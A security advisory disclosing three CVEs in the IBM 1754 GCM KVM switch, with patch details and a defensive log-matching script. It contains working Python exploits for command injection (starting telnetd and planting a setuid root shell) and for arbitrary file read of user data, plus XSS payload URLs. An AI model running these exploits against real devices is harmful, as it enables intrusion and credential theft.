IBM 1754 GCM KVM Multiple Vulnerabilities
Source: alex.a.bravo@gmail.com  Author: Alvarez  Published: 2014-09-01
*Product description*
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1.20.0.22575 and prior are
vulnerable.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
  
*1. Remote code execution*
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
  
#!/usr/bin/python
"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    print "[*] Sending GET to " + target + " with session id " + sessid + "..."
    c.perform()
    c.close()
except:
    print ""
finally:
    print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)
  
*2. Arbitrary file read*
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
  
PoC of this vulnerability:
  
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + file

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    c.perform()
    c.close()
except:
    print ""

content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
  
*3. Cross site scripting non-persistent*
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input. A remote attacker could exploit
this vulnerability using a specially-crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie-based authentication credentials.
  
Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
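
For defenders reviewing logs from a proxy or IDS in front of the KVM's web interface, the three request patterns described above can be matched directly. This is an added example, not code from the advisory's author or from IBM; the log format, the sample lines and the helper names (query_params, classify, scan) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;|&`$<>\r\n]")  # characters a shell treats specially
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)

def query_params(query):
    """Split on '&' only, so a literal ';' stays inside the parameter value."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def classify(target):
    """Return the CVE ids whose request pattern from the advisory the target matches."""
    parts = urlsplit(target)
    path, params = parts.path.lower(), query_params(parts.query)
    hits = []
    if path.endswith("/systest.php") and SHELL_META.search(params.get("lpres", "")):
        hits.append("CVE-2014-2085")
    # Assumption: legitimate filename values are unknown, so any path is flagged.
    if path.endswith("/prodtest.php") and "/" in params.get("filename", ""):
        hits.append("CVE-2014-3081")
    if (path.endswith(("/kvm.cgi", "/avctalert.php"))
            and SCRIPT_TAG.search(unquote_plus(parts.query))):
        hits.append("CVE-2014-3080")
    return hits

def scan(lines):
    """Return (line_number, cve_id) for every log line that matches a pattern."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            findings.extend((number, cve) for cve in classify(match.group(1)))
    return findings

# Constructed sample log (addresses are documentation ranges, not real hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2014:10:00:01 +0000] "GET /systest.php?lpres=;%20/usr/sbin/telnetd%20; HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2014:10:00:05 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=/etc/IBM_user.dat HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Sep/2014:10:01:00 +0000] "GET /avctalert.php?arg1=a&arg2=b&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 300',
    '203.0.113.9 - - [01/Sep/2014:10:01:02 +0000] "GET /kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.20 - - [01/Sep/2014:10:02:00 +0000] "GET /systest.php?lpres=1 HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for number, cve in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, cve))
```

The matcher decodes each parameter once, so it only covers requests shaped like the ones in this advisory; any hit on a device still running v1.20.0.22575 or earlier should be treated as a reason to review that session's activity.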
  
*Vendor Response:*
IBM released firmware 1.20.20.23447.
  
*Timeline:*
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed
  
*External Information:*
Info about the vulnerability (Spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
